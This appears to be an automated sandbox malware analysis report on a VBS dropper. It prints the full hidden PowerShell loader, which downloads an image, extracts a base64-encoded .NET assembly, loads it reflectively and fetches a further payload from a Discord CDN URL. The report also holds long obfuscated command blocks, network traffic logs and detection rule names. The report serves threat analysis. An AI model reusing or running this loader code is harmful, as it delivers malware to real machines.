EDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTr

      Data Obfuscation

      barindex
      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&ff5d219e8eb0f86100e903c887a5bea3fd1a972a6961b6842109d8e8964419b4=mh&a62d0566=si&ae322566=xe?txt.swodniw/6501452233111263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetM
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634Avira URL Cloud: Label: malware
      Source: uploaddeimagens.com.brVirustotal: Detection: 5%Perma Link
      Source: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634Virustotal: Detection: 12%Perma Link
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 89.1% probability
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49733 version: TLS 1.2

      Software Vulnerabilities

      barindex
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

      Networking

      barindex
      Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.114.96.3 443Jump to behavior
      Source: unknownDNS query: name: paste.ee
      Source: cognitivo.vbs.4.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
      Source: cognitivo.vbs.4.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
      Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.br
      Source: global trafficHTTP traffic detected: GET /attachments/1235627023511191643/1243621113322541056/windows.txt?ex=665223ea&is=6650d26a&hm=4b9144698e8d9012486b1696a279a1df3aeb5a788c309e00168f0be8e912d5ff& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
      Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
      Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /d/rXYIP HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /d/rXYIP HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1Host: uploaddeimagens.com.br
      Source: global trafficHTTP traffic detected: GET /attachments/1235627023511191643/1243621113322541056/windows.txt?ex=665223ea&is=6650d26a&hm=4b9144698e8d9012486b1696a279a1df3aeb5a788c309e00168f0be8e912d5ff& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: paste.ee
      Source: global trafficDNS traffic detected: DNS query: uploaddeimagens.com.br
      Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 13:21:18 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=yYiPXt67ZhXzMcLQSY6YnCHOUwz1Dle_47cT4p0pUbs-1716816078-1.0.1.1-t9qn7fneEPezms5fx9bM5LvaFVWJZGcbzMw8VZ15VKZqpW8z64P9cPEzy28BElW1z07qGH3IYYCpgUTDEEc5Iw; path=/; expires=Mon, 27-May-24 13:51:18 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=smxe2mv4co11BudZ9apoC1dYW%2Bu%2B8KVRjyssF5MfxF0B7xWiCnNGv6AyKW2yhs8lZL65clOb2dt%2Fh6GZadc4NtWKMJMZPL%2BhazqH6vozw5QXTLlNvgWYiKn2%2BYlPjmdPg2QpTQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=RuYA0qsDTafElSgm.7zUJR2s4flhHtiR6VWm8WVK9Ok-1716816078699-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 88a64eabbadb429a-EWRalt-svc: h3=":443"; ma=86400
      Source: powershell.exe, 00000001.00000002.2241371780.0000024580094000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1885855670.0000028505905000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000001.00000002.2241371780.0000024580051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2241371780.000002458006A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1885855670.0000028505942000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1885855670.0000028505905000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: wscript.exe, 00000000.00000003.1729188590.00000225650E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
      Source: wscript.exe, 00000000.00000003.1729188590.00000225650E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
      Source: wscript.exe, 00000000.00000003.1729188590.00000225650E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
      Source: wscript.exe, 00000000.00000003.1729188590.00000225650E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1730065640.0000022563098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
      Source: wscript.exe, 00000000.00000003.1729188590.00000225650E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1730065640.0000022563098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
      Source: wscript.exe, 00000000.00000003.1729188590.00000225650E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1730065640.0000022563098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
      Source: wscript.exe, 00000000.00000003.1725442998.000002256592E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1730496254.000002256592E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728546930.000002256592E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com?
      Source: wscript.exe, 00000000.00000002.1730065640.0000022563098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/
      Source: wscript.exe, 00000000.00000003.1728546930.000002256592E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1729699134.0000022564E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1729188590.00000225650E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1729021254.0000022564E82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1730217723.0000022564E86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1724665029.0000022564E8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/rXYIP
      Source: wscript.exe, 00000000.00000003.1725442998.00000225658F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728546930.00000225658FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1730496254.00000225658FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/rXYIPY
      Source: wscript.exe, 00000000.00000002.1730126778.00000225630F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728346909.00000225630CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/rXYIPl
      Source: wscript.exe, 00000000.00000003.1725442998.00000225658F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728546930.00000225658FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1730496254.00000225658FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/rXYIPm
      Source: wscript.exe, 00000000.00000003.1729188590.00000225650E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
      Source: wscript.exe, 00000000.00000003.1729188590.00000225650E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1730065640.0000022563098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
      Source: powershell.exe, 00000001.00000002.2241371780.0000024580617000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634
      Source: wscript.exe, 00000000.00000003.1729188590.00000225650E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: wscript.exe, 00000000.00000003.1729188590.00000225650E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1730065640.0000022563098000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
      Source: wscript.exe, 00000000.00000003.1729188590.00000225650E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49733 version: TLS 1.2

      System Summary

      barindex
      Source: Process Memory Space: powershell.exe PID: 7320, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9750
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9750Jump to behavior
      Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhD
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B670E354_2_00007FFD9B670E35
      Source: las.vbsInitial sample: Strings found which are bigger than 50
      Source: Process Memory Space: powershell.exe PID: 7320, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: classification engineClassification label: mal100.spre.troj.expl.evad.winVBS@11/10@3/3
      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\rXYIP[1].txtJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iaw1jmdp.pdc.ps1Jump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\las.vbs"
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\las.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTre